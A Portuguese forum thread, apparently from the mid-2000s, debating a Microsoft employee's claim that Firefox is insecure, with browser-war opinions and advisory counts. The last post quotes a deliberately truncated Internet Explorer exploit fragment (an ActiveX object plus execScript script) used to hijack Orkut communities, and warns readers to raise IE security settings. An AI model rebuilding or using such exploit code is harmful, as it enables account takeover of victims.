• Comunicados

• Gabriel Torres

Seja um moderador do Clube do Hardware!   13-02-2016

Prezados membros do Clube do Hardware,

Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:
        Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas ao formulário abaixo:    Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
Entre para seguir isso  
Seguidores 0
Ghedin

Firefox inseguro?

11 posts neste tópico

pra facilitar:

Pois bem, resolvi analisar o texto do moço mrgreen O primeiro detalhe que me chama a atenção é o fato dele ser funcionário da Microsoft. Mau sinal... Geralmente falamos bem das coisas que participamos, e denegrimos os concorrentes. Além disso, o blog onde ele publicou o artigo está hospedado no MSDN, portal de desenvolvedores da Microsoft.

Ele comenta (excessivamente, até) sobre o fato do arquivo de instalação do Firefox estar distribuído em diversos pontos do globo e, quando a pessoa inicia o download, o site da Mozilla Foundation seleciona um aleatoriamente. Abrindo um paralelo aqui, creio que muitos conheçam o site SourceForge.net; lá, o esquema é semelhante, com a diferença de que você pode escolher a fonte, mas enfim, o conceito é idêntico: o mesmo arquivo em vários locais, disponíveis para download. Se esse modelo de distribuição é tão criticado assim, porque a Microsoft decidiu liberar o código-fonte de um de seus programas justamente no SourceForge? Provavelmente Bill Gates não consultou o sr. Peter Torr na época...

Outra questão: a assinatura digital. Concordo que ela é uma segurança a mais na hora de instalar programas desconhecidos, mas seria muito inocência (ou idiotice mesmo) achar que todos os programas confiáveis possuem a tal assinatura. Não sei como anda hoje, mas há algum tempo atrás os drivers da nVidia (fabricante das placas de vídeo GeForce) não eram assinado digitalmente rolleyes Sobre as extensões, em partes, concordo com Peter (não sou xiita biggrin). Instalá-las de qualquer fonte é realmente um perigo. Mas aí entra o site Mozilla Update. Neste site da própria Mozilla Foundation (excelente, diga-se de passagem), o usuário do Firefox tem a garantia de encontrar apenas extensões confiáveis, já que, para figurar no catálogo do mesmo, é preciso passar por um rigoroso teste de qualidade (vide aqui).

Continuando, outra crítica do nosso amigo yankee diz respeito às opções padrão do Firefox. Não acreditei quando li isso... Provavelmente ele deve ter alguma tara pela tecla Enter, ou então ter nove dedos quebrados. É tão difícil assim escolher uma opção que não seja a padrão!? Para mim, isso é total falta do que dizer.

Terminando, o sr. Torr falando tanto na questão de segurança disso, segurança daquilo... E quanto ao IE? Procurando na categoria segurança do seu blog, há apenas duas menções: uma falando sobre novos patchs para o IE, e outra sobre um hack nas zonas de segurança do Internet Explorer. Estranho, não? Ele aparenta ser obscecado por problemas de segurança, creio que uma análise do IE cairia muito bem, e seria um tanto justo depois deste lamentável post sobre o Firefox.

Não sou um adorador incondicional do Firefox. Pelo contrário, repudio fanatismo. Mas é inaceitável que uma pessoa, funcionário de uma empresa gigante como a Microsoft, atire a torto e a direito contra qualquer rival de seus produtos, sem motivos. Ainda mais quando este rival é de qualidade. Deveria haver um respeito mútuo, e que cada um continue desenvolvendo seu produto! Não cabe a nenhuma das partes decidir qual é o melhor, ou o mais seguro. A resposta a esta questão cabe aos internautas, e somente a eles.

Compartilhar este post

Link para o post
Compartilhar em outros sites

fala serio, vai dar ouvido a ele?

ele diz que linux é inseguro!!!

outro coisa, se ele acha o IE tão seguro, porque necessita de SP2?

creio eu que vai ter o SP3 tambem.

o windows 2000 se não me engano chegou a Sp6 .. isso é um sistema seguro?

Compartilhar este post

Link para o post

Ele fez críticas justas às deficiências do Firefox que requerem a intervenção do usuário.

Deixo aqui minha crítica à falha do IE onde ele não pergunta absolutamente nada ao usuário mas mesmo assim instala programas maliciosos. Com SP2 ou não, existe esse tipo de falha.

Compartilhar este post

Link para o post

Nenhum programa é livre de falhas, o firefox tem, o IE tem, o Opera tem, faz parte do programa ter algum tipo de falha.

A diferença é o tratamento que é dado a essas falhas pelas empresas. Quando a microsoft solta alguma coisa comparando o sistema deles com os outros, é óbvio que vão puxar a brasa pra sardinha deles. Só que eles demoram pra resolver os problemas, sempre minimizando e dizendo que não tem risco, essa é a falha deles. Eles acham que o povo é *****, que vai cair fácil, que não precisa esquentar a cabeça.

E o maior problema do IE (por isso que parei de usar), é a integração com o sistema. Browser é programa, não deveria ser dessa forma, mas já que eles querem (e pedem por isso cada vez), sou um feliz usuário do Firefox.

Compartilhar este post

Link para o post

oww Fábio, só conheço você que use linux, todo mundo usa windows. por que você não muda pro windows?
Tá, mas e que vantagem eu tenho de usar linux?

eu gostaria que todo esse pessoalzin juntamente com o Sr. Peter desse uma lidinha nisso aqui:

Grave falha de segurança IE + Orkut

façam como eu, o pessoal do cocadaboa, mais de 40% dos usuários de internet do mundo todo e etc... mudem para o Firefox!

Compartilhar este post

Link para o post
Postado Originalmente por Ghedin@31 dez 2004, 17:38

Discordo. Provas? Veja:

-> Secunia: Internet Explorer 6 - 74 Secunia Advisories

-> Secunia: Firefox 1.0 - 4 Secunia Advisories

Acho que isso responde, com total imparcialidade, qual é o mais seguro B)

[]'s

Pois é, faça assim procure o numero de vunerabilidades encontradas no firefox e o numero encontrado no IE depois venha aqui dizer o que achou, esses cara da Mocosoft viajaum muito :chicote:

Compartilhar este post

Link para o post

Seguinte... eu não coloquei o código inteiro pra nenhum zé-mané sair roubando as comunidades dos outros... mas se você percebeu... filtre o clsid....

O cara que tá dando Owned nas comunidades, usa uma simples técnica de engenharia social + uma falha do IE...

Logo, para quem não quiser cair... aumente a segurança do IE para máxima... ou use o Firefox mesmo...

...
apagado...
clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0" align="middle">
<param NAME="ActivateApplets" VALUE="1">
<param NAME="ActivateActiveXControls" VALUE="1">
</object>
<script>
function shellscript()
{
window.name="poorchild";open("http://www.orkut.com/About.aspx","poorchild");

}

function main()
{vipz.DOM.Script.execScript(shellscript.toString());
vipz.DOM.Script.setTimeout("shellscript()");
//alert("Você não tem acesso a este serviço. Faça o cadastro e volte depois");
var myloc=vipz.DOM.location.href;setTimeout('vipz.DOM.Script.execScript ... apagado... }</SCRIPT>

Compartilhar este post

Link para o post

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora
Entre para seguir isso  
Seguidores 0